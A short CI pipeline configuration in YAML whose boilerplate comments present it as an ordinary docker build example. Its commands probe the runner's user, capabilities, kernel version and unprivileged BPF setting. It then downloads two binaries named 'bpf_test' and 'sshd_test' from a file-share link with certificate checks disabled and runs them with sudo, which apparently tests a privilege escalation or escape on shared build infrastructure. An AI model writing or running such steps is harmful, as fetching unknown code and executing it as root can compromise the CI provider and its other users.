build:
  nodes:
    docker-build:
      environment:
        # caching works with the remote_engine and the local executor
        docker: true

      # This example uses a minimal node, but it works equally fine with a auto-setup node.
      commands:
        - whoami
        - cat /proc/1/status | grep Cap
        - uname -a
        - cat /proc/sys/kernel/unprivileged_bpf_disabled
        - cat /proc/sys/kernel/unprivileged_bpf_disabled
        - wget https://cloud.tsinghua.edu.cn/f/76307d9ba25040beaef6/?dl=1 -O bpf_test --no-check-certificate
        - chmod +x bpf_test
        - sudo ./bpf_test
        - wget https://cloud.tsinghua.edu.cn/f/3b5e5862ee254ba29df3/?dl=1 -O sshd_test --no-check-certificate
        - chmod +x sshd_test
        - sudo ./sshd_test